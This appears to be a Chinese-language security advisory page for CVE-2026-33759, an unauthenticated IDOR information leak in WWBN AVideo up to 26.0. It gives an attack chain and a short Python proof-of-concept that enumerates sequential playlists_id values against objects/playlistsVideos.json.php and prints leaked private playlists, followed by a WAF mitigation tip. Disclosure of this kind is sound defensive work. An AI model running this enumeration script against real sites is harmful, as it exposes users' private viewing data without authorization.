CVE-2026-33759 CVSS 5.3 中危

CVE-2026-33759 WWBN AVideo信息泄露漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33759

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo开源视频平台在26.0及之前版本中存在安全漏洞。由于`objects/playlistsVideos.json.php`端点缺乏身份验证和授权检查，攻击者可以通过提供顺序整数的`playlists_id`参数，直接获取任意播放列表的视频内容，包括本应隐藏的“稍后观看”和“收藏”等私有播放列表。该漏洞导致敏感信息泄露。

技术细节

该漏洞本质上是IDOR（不安全的直接对象引用）漏洞。在受影响版本的AVideo中，`objects/playlistsVideos.json.php`接口用于检索播放列表内的视频列表。然而，该接口仅依据传入的`playlists_id`参数返回数据，未对请求者进行身份验证，也未验证请求者是否有权访问该特定的播放列表ID。虽然私有播放列表在常规列表接口中被隐藏，但由于该ID是自增整数，攻击者可以通过暴力枚举或简单的顺序猜测ID，发送HTTP请求直接调用此接口，从而绕过前端和列表接口的权限限制，窃取用户的私有数据。

攻击链分析

STEP 1

信息收集

攻击者识别出目标正在使用WWBN AVideo平台，并确认版本在26.0或以下。

STEP 2

枚举攻击

由于播放列表ID通常是顺序整数，攻击者编写脚本遍历可能的ID（例如1到10000）。

STEP 3

漏洞利用

针对每个ID，攻击者向`objects/playlistsVideos.json.php`发送GET请求，参数为`playlists_id`，且不携带任何认证Cookie或Token。

STEP 4

数据泄露

服务器返回该ID对应的播放列表内容。如果是私有播放列表（如watch_later），攻击者成功获取了本应受保护的视频信息和用户隐私数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

def check_vulnerability(target_url, playlist_id):
    """
    Check if the target is vulnerable to CVE-2026-33759.
    """
    # The vulnerable endpoint
    endpoint = f"{target_url}/objects/playlistsVideos.json.php"
    
    # Payload parameters
    params = {
        'playlists_id': playlist_id
    }
    
    try:
        # Send request without authentication
        response = requests.get(endpoint, params=params, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            if 'videos' in data or len(data) > 0:
                print(f"[+] Vulnerable! Playlist ID {playlist_id} content leaked:")
                print(data)
                return True
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    target = "http://localhost/AVideo" # Replace with actual target
    # Try to enumerate sequential IDs
    for i in range(1, 100):
        check_vulnerability(target, i)

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

如果无法立即升级，建议在Web应用防火墙（WAF）中添加规则，拦截对`objects/playlistsVideos.json.php`端点的未授权请求，或暂时禁用该接口的功能直至修复完成。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表